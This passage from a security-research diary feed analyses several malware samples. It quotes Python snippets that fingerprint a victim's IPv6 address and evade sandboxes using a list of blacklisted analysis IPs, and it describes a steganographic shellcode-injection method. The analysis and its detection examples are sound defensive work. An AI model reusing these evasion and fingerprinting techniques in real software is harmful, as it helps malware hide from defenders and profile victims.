Restricting access to the phishing page to specific user agents helps keep the site up longer: a casual test of the URL only redirects to the legitimate USPS website, which may trick an ISP's abuse department into believing it is not a phishing page. When verifying or reporting such a URL, fetch it with the user agent of the targeted device (here, Safari on iOS).

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

July 29, 2023

Do Attackers Pay More Attention to IPv6?, (Sat, Jul 29th)

IPv6 has always been a hot topic! Available for years, it has been deployed by many ISPs down to their residential customers. Belgium was for a long time the number-one country in IPv6 deployment, because all the big players provided IPv6 connectivity. Today's operating systems prefer IPv6 when the host sees "RA" packets (router advertisements [1]) and can obtain an IPv6 address, and this is totally transparent. That's why many people think they don't use IPv6 when they actually do!

To access online resources, a host will try to resolve a domain or hostname by generating "A" or "AAAA" DNS requests. A malware that relies on the host resolver doesn't need to know if the C2 is available via IPv4, IPv6 or both!

I have wondered for a long time why attackers don't pay more attention to IPv6 connectivity, since it may be less hardened or not monitored at all. How many security controls rely on regexes that only match IPv4 addresses?

Today, I found a malicious Python script that fingerprints the victim (usual behaviour) but, this time, also tries to get the IPv6 address of the victim's computer:

import socket  # imported at the top of the sample

def get_ipv6_address():
    try:
        i6_s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
        # connect() on a UDP socket sends nothing; it only selects the source address
        i6_s.connect(("2001:4860:4860::8888", 80))
        i6s_s = i6_s.getsockname()[0]
        i6_s.close()
        return i6s_s
    except socket.error:
        return None

(The address used is Google's public DNS resolver. No packet is sent: a connect() on a UDP socket only makes the OS pick the source address it would use to reach that destination, which is exactly the victim's routable IPv6 address.)
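The blind spot raised above ("regexes that only match IPv4"), as an added example (not the sample's code): an indicator extractor that finds both IPv4 and IPv6 addresses, including defanged ("[.]") and bracketed "[addr]:port" forms, validates them with the standard ipaddress module and reports what an IPv4-only regex would have missed. The sample text is constructed; the C2 addresses are from documentation ranges.

```python
import ipaddress
import re

# What an IPv4-only control typically uses.
IPV4_ONLY_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Loose candidate tokens for both families; ipaddress does the real validation.
CANDIDATE_RE = re.compile(r"[0-9A-Fa-f:.]+")


def refang(text):
    """Undo the usual defanging so indicators copied from reports are matched too."""
    return text.replace("[.]", ".").replace("[:]", ":")


def extract_ipv4_only(text):
    return IPV4_ONLY_RE.findall(text)


def extract_ips(text):
    """Every syntactically valid IPv4/IPv6 address in text, in order, deduplicated."""
    found = []
    for token in CANDIDATE_RE.findall(refang(text)):
        for candidate in (token, token.strip(".")):
            try:
                ip = ipaddress.ip_address(candidate)
            except ValueError:
                continue
            if ip not in found:
                found.append(ip)
            break
    return found


def classify(ip):
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    if ip.is_private:
        return "private"
    if ip.is_global:
        return "global"
    return "other"


def _valid(s):
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


def ipv4_only_blind_spots(text):
    """Addresses the full extractor sees but an IPv4-only regex on the raw text misses."""
    seen_by_v4 = {ipaddress.ip_address(a) for a in extract_ipv4_only(text) if _valid(a)}
    return [ip for ip in extract_ips(text) if ip not in seen_by_v4]


# Constructed snippet mixing a script line, a defanged C2, a bracketed IPv6
# endpoint and a timestamp (which must not be mistaken for an address).
SAMPLE = """\
i6_s.connect(("2001:4860:4860::8888", 80))
c2 = "203[.]0[.]113[.]7"; fallback = "[2001:db8::c2]:8443"; local = "127.0.0.1"
Jul 31 12:00:05 beacon sent
"""

if __name__ == "__main__":
    for ip in extract_ips(SAMPLE):
        print(f"{ip!s:24} v{ip.version} {classify(ip)}")
    print("missed by IPv4-only regex:", [str(ip) for ip in ipv4_only_blind_spots(SAMPLE)])
```

On the sample, the IPv4-only regex returns just 127.0.0.1; both IPv6 addresses and the defanged C2 are invisible to it, which is the monitoring gap the post is asking about.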

Does it mean that attackers will pay more attention to IPv6? Let's see in the future!

[1] https://en.wikipedia.org/wiki/Neighbor_Discovery_Protocol

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

July 28, 2023

ShellCode Hidden with Steganography, (Fri, Jul 28th)

When hunting, I'm often surprised by the interesting pieces of code you can discover... Attackers (or pentesters/red teamers) like to submit scripts to VT to evaluate detection rates across many antivirus products. Sometimes you find cool stuff.

Yesterday, I found a small Python script that injects shellcode into memory, but this time the payload is hidden in a PNG picture using a well-known technique: steganography[1]. The sample uses the LSB (least significant bit) of each pixel value to carry one bit of the payload[2]. On the Internet you can find many free services to hide a text message in a picture (and vice versa), but you can store absolutely any kind of data this way, in this case executable code (the shellcode).

The script (SHA256:465b63b8661f2175d1063bfefdde2f949d366448e34d6e1a4f9853709352d02e) has a VT score of 16/60[3].

The most interesting function is the one that rebuilds the payload from the pixels' least significant bits (shown as a screenshot in the original diary). Once the payload is extracted, a classic method is used to run the shellcode (with the ctypes Python library):

  • Allocate some memory with VirtualAlloc()
  • Copy the shellcode in memory with RtlMoveMemory()
  • Kick-off the shellcode with CreateThread()

The sample extracts the shellcode from a file called "poc_example.png"; unfortunately, I was not able to get this file!
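The LSB technique described above, as an added example (not the sample's code): embed_lsb() hides a length-prefixed payload in the least significant bit of successive channel bytes and extract_lsb() recovers it. The cover is a constructed buffer of pseudo-random byte values standing in for a PNG's RGB data (with Pillow, Image.open(path).convert("RGB").tobytes() yields the same kind of buffer); the 4-byte length prefix is this example's own convention, since the sample's container format is not shown. The payload is three harmless bytes (NOP, NOP, INT3) standing in for shellcode, and nothing here executes anything.

```python
import random


def embed_lsb(cover, payload):
    """Write len(payload) (4 bytes, big-endian; this example's convention) followed by
    payload into the least significant bit of successive cover bytes."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small: need %d bytes, have %d" % (len(bits), len(cover)))
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit  # clear the LSB, then set it to the payload bit
    return bytes(out)


def _read_lsb_bytes(cover, offset, count):
    """Reassemble count bytes from the LSBs of cover, starting at cover index offset."""
    result = bytearray()
    for b in range(count):
        byte = 0
        for i in range(8):
            byte = (byte << 1) | (cover[offset + b * 8 + i] & 1)
        result.append(byte)
    return bytes(result)


def extract_lsb(cover):
    """Read the length prefix, then that many payload bytes, from the LSBs."""
    length = int.from_bytes(_read_lsb_bytes(cover, 0, 4), "big")
    if 32 + length * 8 > len(cover):
        raise ValueError("length prefix exceeds cover size: probably no LSB payload")
    return _read_lsb_bytes(cover, 32, length)


def max_pixel_change(cover, stego):
    """Largest per-byte difference between cover and stego image data."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed cover: 4096 pseudo-random channel values standing in for RGB bytes.
COVER = bytes(random.Random(1).randrange(256) for _ in range(4096))
PAYLOAD = b"\x90\x90\xcc"  # NOP, NOP, INT3: a harmless stand-in for shellcode

if __name__ == "__main__":
    stego = embed_lsb(COVER, PAYLOAD)
    print("recovered:", extract_lsb(stego).hex())
    print("max change per byte:", max_pixel_change(COVER, stego))
```

Because only the least significant bit changes, no byte moves by more than one, which is why visual inspection never reveals the payload; max_pixel_change() makes that explicit. Note that the trick only survives lossless formats such as PNG: JPEG recompression would destroy the LSBs.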

[1] https://en.wikipedia.org/wiki/Steganography
[2] https://medium.com/swlh/lsb-image-steganography-using-python-2bbbee2c69a2
[3] https://www.virustotal.com/gui/file/465b63b8661f2175d1063bfefdde2f949d366448e34d6e1a4f9853709352d02e

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

July 28, 2023

ISC Stormcast For Friday, July 28th, 2023 https://isc.sans.edu/podcastdetail/8592, (Fri, Jul 28th)

July 27, 2023

ISC Stormcast For Thursday, July 27th, 2023 https://isc.sans.edu/podcastdetail/8590, (Thu, Jul 27th)

July 26, 2023

Suspicious IP Addresses Avoided by Malware Samples, (Wed, Jul 26th)

Modern malware samples implement a lot of anti-debugging and anti-analysis techniques. The idea is to slow down the malware analyst's job or, more simply, to evade security solutions like sandboxes. These days, I see more and more malware samples written in Python with these built-in capabilities. One of them is the detection of "suspicious" IP addresses.

The last one I found has the SHA256 9d4d651095f9e03a0321def2dc47252ed22334664218f3df9e2f3dbbf99cdc1b with a VT score of 8/57[1].

Here is a common code snippet:

import urllib.request

def check_ip():
    blacklisted = { ... }
    while True:
        try:
            ip = urllib.request.urlopen('https://checkip.amazonaws.com').read().decode().strip()
            if ip in blacklisted:
                exit_program('Blacklisted IP Detected')  # defined elsewhere in the sample
            return
        except:
            pass  # lookup failed (no network yet): keep retrying

The malware queries the public IP address of the host it is running on and, if that address is present in the "blacklisted" set, it exits. Note the "while True" with a bare "except": the lookup is retried forever, so an analysis box without Internet access never gets past this check. But what are these IP addresses? I had a look at them, and here is the list with their PTR records, AS names and countries, plus the ISC (DShield) statistics for each:

IP Address | PTR Record | AS Name | AS Country | Attacks (ISC) | Count (ISC)
20[.]99[.]160[.]173 | NXDOMAIN | MICROSOFT-CORP-MSN-AS-BLOCK | US | 0 | 0
23[.]128[.]248[.]46 | tor-exit46[.]stormycloud[.]org | DATAIDEAS-LLC | US | 0 | 0
34[.]105[.]0[.]27 | 27[.]0[.]105[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]105[.]183[.]68 | 68[.]183[.]105[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 21 | 32
34[.]105[.]72[.]241 | 241[.]72[.]105[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]138[.]96[.]23 | 23[.]96[.]138[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]141[.]146[.]114 | 114[.]146[.]141[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 19 | 28
34[.]141[.]245[.]25 | 25[.]245[.]141[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 35 | 51
34[.]142[.]74[.]220 | 220[.]74[.]142[.]34[.]bc[.]googleusercontent[.]com | GOOGLE | US | 0 | 0
34[.]145[.]195[.]58 | 58[.]195[.]145[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]145[.]89[.]174 | 174[.]89[.]145[.]34[.]bc[.]googleusercontent[.]com | GOOGLE | US | 0 | 0
34[.]253[.]248[.]228 | ec2-34-253-248-228[.]eu-west-1[.]compute[.]amazonaws[.]com | AMAZON-02 | US | 0 | 0
34[.]83[.]46[.]130 | 130[.]46[.]83[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]85[.]243[.]241 | 241[.]243[.]85[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]85[.]253[.]170 | 170[.]253[.]85[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
35[.]192[.]93[.]107 | 107[.]93[.]192[.]35[.]bc[.]googleusercontent[.]com | GOOGLE | US | 0 | 0
35[.]199[.]6[.]13 | 13[.]6[.]199[.]35[.]bc[.]googleusercontent[.]com | GOOGLE | US | 0 | 0
35[.]229[.]69[.]227 | 227[.]69[.]229[.]35[.]bc[.]googleusercontent[.]com | GOOGLE | US | 0 | 0
35[.]237[.]47[.]12 | 12[.]47[.]237[.]35[.]bc[.]googleusercontent[.]com | GOOGLE | US | 0 | 0
64[.]124[.]12[.]162 | 64[.]124[.]12[.]162[.]IDIA-144793-004-ZYO[.]zip[.]zayo[.]com | ZAYO-6461 | US | 0 | 0
78[.]139[.]8[.]50 | catv-78-139-8-50[.]catv[.]fixed[.]vodafone[.]hu | ASN-VODAFONE- | HU | 0 | 0
79[.]104[.]209[.]33 | NXDOMAIN | SOVAM-AS | RU | 0 | 0
80[.]211[.]0[.]97 | host97-0-211-80[.]serverdedicati[.]aruba[.]it | ARUBA-ASN | IT | 0 | 0
84[.]147[.]54[.]113 | p54933671[.]dip0[.]t-ipconnect[.]de | DTAG Internet service provider operations | DE | 0 | 0
84[.]147[.]62[.]12 | p54933e0c[.]dip0[.]t-ipconnect[.]de | DTAG Internet service provider operations | DE | 0 | 0
87[.]166[.]50[.]213 | p57a632d5[.]dip0[.]t-ipconnect[.]de | DTAG Internet service provider operations | DE | 0 | 0
88[.]132[.]225[.]100 | host-88-132-225-100[.]kabelszat2002[.]hu | GAX-KABELSZAT | HU | 0 | 0
88[.]132[.]226[.]203 | host-88-132-226-203[.]kabelszat2002[.]hu | GAX-KABELSZAT | HU | 0 | 0
88[.]132[.]227[.]238 | host-88-132-227-238[.]kabelszat2002[.]hu | GAX-KABELSZAT | HU | 0 | 0
88[.]132[.]231[.]71 | host-88-132-231-71[.]kabelszat2002[.]hu | GAX-KABELSZAT | HU | 0 | 0
88[.]153[.]199[.]169 | ip-088-153-199-169[.]um27[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
92[.]211[.]109[.]160 | ipservice-092-211-109-160[.]092[.]211[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
92[.]211[.]192[.]144 | ipservice-092-211-192-144[.]092[.]211[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
92[.]211[.]52[.]62 | ipservice-092-211-052-062[.]092[.]211[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
92[.]211[.]55[.]199 | ipservice-092-211-055-199[.]092[.]211[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
93[.]216[.]75[.]209 | p5dd84bd1[.]dip0[.]t-ipconnect[.]de | DTAG Internet service provider operations | DE | 0 | 0
95[.]25[.]204[.]90 | 95-25-204-90[.]broadband[.]corbina[.]ru | CORBINA-AS OJSC Vimpelcom | RU | 0 | 0
95[.]25[.]81[.]24 | 95-25-81-24[.]broadband[.]corbina[.]ru | CORBINA-AS OJSC Vimpelcom | RU | 0 | 0
104[.]18[.]12[.]38 | NXDOMAIN | CLOUDFLARENET | US | 0 | 0
109[.]145[.]173[.]169 | host109-145-173-169[.]range109-145[.]btcentralplus[.]com | BT-UK-AS BTnet UK Regional network | GB | 0 | 0
109[.]74[.]154[.]90 | SERVFAIL | VNET-AS | SK | 0 | 0
109[.]74[.]154[.]91 | SERVFAIL | VNET-AS | SK | 0 | 0
109[.]74[.]154[.]92 | SERVFAIL | VNET-AS | SK | 0 | 0
178[.]239[.]165[.]70 | 70[.]165[.]239[.]178[.]baremetal[.]zare[.]com | BANDWIDTH-AS | GB | 1 | 1
188[.]105[.]91[.]116 | dslb-188-105-091-116[.]188[.]105[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
188[.]105[.]91[.]143 | dslb-188-105-091-143[.]188[.]105[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
188[.]105[.]91[.]173 | dslb-188-105-091-173[.]188[.]105[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
192[.]211[.]110[.]74 | NXDOMAIN | DNIC-ASBLK-00721-00726 | US | 0 | 0
192[.]40[.]57[.]234 | NXDOMAIN | PERFORMIVE | US | 0 | 0
192[.]87[.]28[.]103 | 192[.]87[.]28[.]103[.]dyn[.]centr[.]nl | SURFNET-NL SURFnet, The Netherlands | NL | 1 | 1
193[.]128[.]114[.]45 | h193-128-114-45[.]ptr[.]roamsite[.]com | UUNET | US | 0 | 0
193[.]225[.]193[.]201 | NXDOMAIN | HBONE-AS KIFU | HU | 0 | 0
194[.]154[.]78[.]160 | SERVFAIL | SOVAM-AS | RU | 0 | 0
195[.]181[.]175[.]105 | unn-195-181-175-105[.]datapacket[.]com | CDN77 \\^_^ | GB | 0 | 0
195[.]239[.]51[.]3 | NXDOMAIN | SOVAM-AS | RU | 0 | 0
195[.]239[.]51[.]59 | NXDOMAIN | SOVAM-AS | RU | 0 | 0
195[.]74[.]76[.]222 | r-222[.]76[.]74[.]195[.]ptr[.]avast[.]com | AVAST-AS-DC | CZ | 0 | 0
212[.]119[.]227[.]151 | NXDOMAIN | SOVAM-AS |  |  | 

RU

0

0

212[.]119[.]227[.]167

NXDOMAIN

SOVAM-AS

RU

0

0

213[.]33[.]142[.]50

mail[.]areal-hotel[.]ru

SOVAM-AS

RU

0

0

Most of these IP addresses belong to major cloud providers. You can also see that some of them have a non-zero number of attacks/counts (results extracted from our API[2]). Most of them are probably sandboxes or analysis systems deployed by security companies or researchers? I did a quick nmap scan of them and most do not expose any port/service.

In the case above, the IP address verification is not performed to detect whether the computer is an interesting host to infect or not (classic scenario: when country "x" would like to attack country "y"). In such a scenario, the tests performed will rely on the big IP pools used by Internet providers, the keyboard mapping, the OS language, etc.

I will keep this list of IP addresses up to date across my discovered samples and see if there are big changes.

[1] https://www[.]virustotal[.]com/gui/file/9d4d651095f9e03a0321def2dc47252ed22334664218f3df9e2f3dbbf99cdc1b
[2] https://isc.sans.edu/api/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
July 26, 2023

ISC Stormcast For Wednesday, July 26th, 2023 https://isc.sans.edu/podcastdetail/8588, (Wed, Jul 26th)

July 25, 2023

ISC Stormcast For Tuesday, July 25th, 2023 https://isc.sans.edu/podcastdetail/8586, (Tue, Jul 25th)

July 24, 2023

Apple Updates Everything (again), (Mon, Jul 24th)

Apple released one of its usual "step" upgrades for its operating systems. This covers iOS, iPadOS, macOS, tvOS and watchOS. The update also includes the vulnerability patched in the last rapid security response update.

Our "ChatGPT CVSS calculator" didn't work well this time. I still left the scores in, but if you see "0", "?" or "unknown", this means ChatGPT didn't respond with a CVSS score.

| CVE | Severity | ChatGPT-CVSS | Component | Fix | Impact | iOS/iPadOS 16.6 | iOS/iPadOS 15.7.8 | macOS Ventura 13.5 | macOS Monterey 12.6.8 | macOS Big Sur 11.7.9 | tvOS 16.6 | watchOS 9.6 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| CVE-2023-38136 | important | 9.8 | Apple Neural Engine | The issue was addressed with improved memory handling. | An app may be able to execute arbitrary code with kernel privileges | x | | | | | | x |
| CVE-2023-38580 | important | ? | Apple Neural Engine | The issue was addressed with improved memory handling. | An app may be able to execute arbitrary code with kernel privileges | x | | x | | | | x |
| CVE-2023-32416 | important | unknown | Find My | A logic issue was addressed with improved restrictions. | An app may be able to read sensitive location information | x | x | x | x | | | x |
| CVE-2023-32734 | important | unknown | Kernel | The issue was addressed with improved memory handling. | An app may be able to execute arbitrary code with kernel privileges | x | | x | | | x | x |
| CVE-2023-32441 | important | 8.8 | Kernel | The issue was addressed with improved memory handling. | An app may be able to execute arbitrary code with kernel privileges | x | x | x | x | x | x | x |
| CVE-2023-38261 | important | unknown | Kernel | The issue was addressed with improved memory handling. | An app may be able to execute arbitrary code with kernel privileges | x | | x | | | | |
| CVE-2023-38424 | important | unknown | Kernel | The issue was addressed with improved memory handling. | An app may be able to execute arbitrary code with kernel privileges | x | | x | | | | |
| CVE-2023-38425 | important | 9.8 | Kernel | The issue was addressed with improved memory handling. | An app may be able to execute arbitrary code with kernel privileges | x | | x | | | | |
| CVE-2023-38606 | moderate (EXPLOITED) | unknown | Kernel | This issue was addressed with improved state management. | An app may be able to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1. | x | x | x | x | x | x | x |
| CVE-2023-32381 | important | unknown | Kernel | A use-after-free issue was addressed with improved memory management. | An app may be able to execute arbitrary code with kernel privileges | x | | x | x | x | x | x |
| CVE-2023-32433 | important | unknown | Kernel | A use-after-free issue was addressed with improved memory management. | An app may be able to execute arbitrary code with kernel privileges | x | x | x | x | x | x | x |
| CVE-2023-35993 | important | unknown | Kernel | A use-after-free issue was addressed with improved memory management. | An app may be able to execute arbitrary code with kernel privileges | x | x | x | x | x | x | x |
| CVE-2023-38410 | important | 0 | Kernel | The issue was addressed with improved checks. | A user may be able to elevate privileges | x | | x | | | | |
| CVE-2023-38603 | moderate | 0 | Kernel | The issue was addressed with improved checks. | A remote user may be able to cause a denial-of-service | x | | x | | | | |
| CVE-2023-38565 | important | 7.0 | libxpc | A path handling issue was addressed with improved validation. | An app may be able to gain root privileges | x | | x | x | x | | x |
| CVE-2023-38593 | important | 0 | libxpc | A logic issue was addressed with improved checks. | An app may be able to cause a denial-of-service | x | | x | x | x | | x |
| CVE-2023-32437 | important | 0 | NSURLSession | The issue was addressed with improvements to the file handling protocol. | An app may be able to break out of its sandbox | x | | | | | | |
| CVE-2023-38572 | moderate | 0 | WebKit | The issue was addressed with improved checks. | A website may be able to bypass Same Origin Policy | x | x | x | | | x | x |
| CVE-2023-38594 | critical | unknown | WebKit | The issue was addressed with improved checks. | Processing web content may lead to arbitrary code execution | x | x | x | | | x | x |
| CVE-2023-38595 | critical | 0 | WebKit | The issue was addressed with improved checks. | Processing web content may lead to arbitrary code execution | x | | x | | | x | x |
| CVE-2023-38600 | critical | unknown | WebKit | The issue was addressed with improved checks. | Processing web content may lead to arbitrary code execution | x | | x | | | x | x |
| CVE-2023-38611 | critical | 8.1 | WebKit | The issue was addressed with improved memory handling. | Processing web content may lead to arbitrary code execution | x | | x | | | x | x |
| CVE-2023-37450 | critical (EXPLOITED) | 8.2 | WebKit | The issue was addressed with improved checks. | Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. | x | | x | | | x | x |
| CVE-2023-38597 | critical | 8.6 | WebKit Process Model | The issue was addressed with improved checks. | Processing web content may lead to arbitrary code execution | x | x | x | | | | |
| CVE-2023-38133 | moderate | 0 | WebKit Web Inspector | The issue was addressed with improved checks. | Processing web content may disclose sensitive information | x | x | x | | | x | x |
| CVE-2023-23540 | important | unknown | Apple Neural Engine | The issue was addressed with improved memory handling. | An app may be able to execute arbitrary code with kernel privileges | | x | | | | | |
| CVE-2023-32409 | moderate (EXPLOITED) | 8.8 | WebKit | The issue was addressed with improved bounds checks. | A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited. | | x | | | | | |
| CVE-2023-36862 | moderate | unknown | AppleMobileFileIntegrity | A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. | An app may be able to determine a user's current location | | | x | | | | |
| CVE-2023-32364 | moderate | 0 | AppSandbox | A logic issue was addressed with improved restrictions. | A sandboxed process may be able to circumvent sandbox restrictions | | | x | | | | |
| CVE-2023-35983 | important | 8.2 | Assets | This issue was addressed with improved data protection. | An app may be able to modify protected parts of the file system | | | x | x | x | | |
| CVE-2023-28319 | moderate | unknown | curl | Multiple issues were addressed by updating curl. | Multiple issues in curl | | | x | x | x | | |
| CVE-2023-28320 | moderate | 0 | curl | Multiple issues were addressed by updating curl. | Multiple issues in curl | | | x | x | x | | |
| CVE-2023-28321 | moderate | unknown | curl | Multiple issues were addressed by updating curl. | Multiple issues in curl | | | x | x | x | | |
| CVE-2023-28322 | moderate | unknown | curl | Multiple issues were addressed by updating curl. | Multiple issues in curl | | | x | x | x | | |
| CVE-2023-32418 | moderate | 4.0 | Grapher | The issue was addressed with improved checks. | Processing a file may lead to unexpected app termination or arbitrary code execution | | | x | x | x | | |
| CVE-2023-36854 | moderate | unknown | Grapher | The issue was addressed with improved checks. | Processing a file may lead to unexpected app termination or arbitrary code execution | | | x | x | x | | |
| CVE-2023-38258 | important | 0 | Model I/O | The issue was addressed with improved checks. | Processing a 3D model may result in disclosure of process memory | | | x | x | | | |
| CVE-2023-38421 | important | 0 | Model I/O | The issue was addressed with improved checks. | Processing a 3D model may result in disclosure of process memory | | | x | x | | | |
| CVE-2023-2953 | moderate | 0 | OpenLDAP | The issue was addressed with improved memory handling. | A remote user may be able to cause a denial-of-service | | | x | x | x | | |
| CVE-2023-38259 | important | 0 | PackageKit | A logic issue was addressed with improved restrictions. | An app may be able to access user-sensitive data | | | x | x | x | | |
| CVE-2023-38564 | important | 0 | PackageKit | The issue was addressed with improved checks. | An app may be able to modify protected parts of the file system | | | x | | | | |
| CVE-2023-38602 | important | 0 | PackageKit | A permissions issue was addressed with additional restrictions. | An app may be able to modify protected parts of the file system | | | x | x | x | | |
| CVE-2023-32442 | moderate | 0 | Shortcuts | An access issue was addressed with improved access restrictions. | A shortcut may be able to modify sensitive Shortcuts app settings | | | x | x | | | |
| CVE-2023-32443 | moderate | 0 | sips | An out-of-bounds read was addressed with improved input validation. | Processing a file may lead to a denial-of-service or potentially disclose memory contents | | | x | x | x | | |
| CVE-2023-32429 | important | unknown | SystemMigration | The issue was addressed with improved checks. | An app may be able to bypass Privacy preferences | | | x | | | | |
| CVE-2023-38608 | important | unknown | Voice Memos | The issue was addressed with additional permissions checks. | An app may be able to access user-sensitive data | | | x | | | | |

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

July 24, 2023

JQ: Another Tool We Thought We Knew, (Mon, Jul 24th)

So often you'll see folks (me included) use "jq" to take an unformatted JSON mess and turn it into readable output. For instance, last Thursday we used the Shodan API to dump about 650k of host info like this:
curl -s -k "https://api.shodan.io/shodan/host/%1?key=%shodan-api-key%" | jq

In other words, up to today, I've just used jq as a JSON "prettifier".

At some point (OK, TIL), I finally clued into the fact that the "q" in "jq" stands for "query".

First, let's simplify things by making a file that we can play with (see Thursday's diary - https://isc.sans.edu/diary/Shodans+API+For+The+Recon+Win/30050/ - for details on the API call below):

curl -s -k "https://api.shodan.io/shodan/host/45.60.31.34?key=%shodan-api-key%" > isc.txt

Let's use jq to query / extract the "ports" array in the file:

type isc.txt | jq ".ports"
[
  1024,
  8200,
  25,
  8112,
  2082,
  2083,
  2087,
  554,
  14344,
  53,
  12345,
  60001,
  9800,
  587,
  80,
  5201,
.. and so on (123 open ports)

Printing these without the carriage returns gets it all on one page; sometimes that's important:

type isc.txt | jq ".ports" --compact-output
[1024,8200,25,8112,2082,2083,2087,554,14344,53,12345,60001,9800,587,80,5201,82,83,14265,9306,8800,7777,7779,31337,631,8834,16010,5269,1177,5800,2222,8880,8888,8889,3268,3269,10443,3790,9080,1234,10134,3299,4848,9001,8443,13579,5900,5901,9998,9999,10000,10001,7443,9000,2345,9002,6443,4911,9009,7474,1337,9530,3389,8001,8009,8010,50000,9443,7001,4443,4444,5985,5986,5007,5009,6000,6001,1400,8060,9600,9090,9091,389,9095,5000,5001,9100,5005,5006,1935,8081,5010,8083,4500,8085,8086,8089,8090,7071,4000,8098,25001,2480,4022,5560,3001,8123,444,8126,6080,4040,8139,465,4567,4064,9191,3050,9200,1521,8181,443]


Let's extract both the domains and hostnames (often these are the same):
type isc.txt | jq ".domains,.hostnames"
[
  "cio.org",
  "ranges.io",
  "cyberaces.org",
  "sans.co",
  "imperva.com",
  "cyberfoundations.org",
  "securingthehuman.org",
  "sans.org",
  "giac.net",
  "sans.edu",
  "giac.org",
  "cybercenters.org"
]
[
  "cio.org",
  "ranges.io",
  "cyberaces.org",
  "sans.co",
  "giac.net",
  "imperva.com",
  "cyberfoundations.org",
  "qms.sans.org",
  "content.sans.org",
  "sans.org",
  "sso.securingthehuman.org",
  "isc.sans.edu",
  "sans.edu",
  "giac.org",
  "cybercenters.org"
]

At some point, you'll find that the IP addresses returned by Shodan are typically in decimal. No problem: convert the decimal value to hex, then convert each octet back to decimal and stuff the dots in! Or you can just ask for both the ip and ip_str values:

type isc.txt | jq ".ip,.ip_str"
  758914850,
  "45.60.31.34"


How about just dumping out the keys that you can mess with?

type isc.txt |  jq "keys"
[
  "area_code",
  "asn",
  "city",
  "country_code",
  "country_name",
  "data",
  "domains",
  "hostnames",
  "ip",
  "ip_str",
  "isp",
  "last_update",
  "latitude",
  "longitude",
  "org",
  "os",
  "ports",
  "region_code",
  "tags"
]

There's way more to jq: you can execute scripts, add and delete keys, sort output or do math on the various values. From the "query" perspective, you can treat your JSON input very much like a SQL database; you can use statements like select, index and join, which should all look very familiar.
You can also write scripts for jq to execute. The scripts have all the scripty things you'd expect: if/then/else, try/catch, boolean operators, regex support, text manipulation operators and so on.
If you have jq installed, typing "man jq" will give you several pages of possibilities; even "jq --help" will get you started. Googling "man jq" will give you the same if you don't have it installed yet.
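
The decimal-to-dotted conversion mentioned earlier and the select/sort/math features listed here, as an added example that is not part of the diary: it runs jq over a constructed Shodan-style host record, so the banner values, the expired-certificate flag and the watch list of management ports are all assumptions, not data from the real API.

```shell
#!/bin/sh
# Added example, not from the diary: jq as a query language over a
# Shodan-style host record. SAMPLE is a constructed document that mimics
# the shape of the API response seen above (ip, ip_str, ports, hostnames,
# data[]); every value in it is made up except the diary's own IP pair.
SAMPLE='{
  "ip": 758914850,
  "ip_str": "45.60.31.34",
  "ports": [1024, 8200, 25, 80, 443, 3389, 5900, 31337],
  "hostnames": ["isc.sans.edu", "sans.edu"],
  "data": [
    {"port": 25,   "transport": "tcp", "product": "smtpd-example"},
    {"port": 80,   "transport": "tcp", "product": "httpd-example"},
    {"port": 443,  "transport": "tcp", "product": "httpd-example",
     "ssl": {"cert": {"expired": true}}},
    {"port": 3389, "transport": "tcp", "product": "rdp-example"},
    {"port": 5900, "transport": "tcp", "product": "vnc-example"}
  ]
}'

# Decimal -> dotted quad with jq arithmetic only: peel off each octet,
# most significant first, instead of hand-converting through hex.
ip_from_decimal() {
  printf '%s' "$SAMPLE" | jq -r '
    .ip as $n
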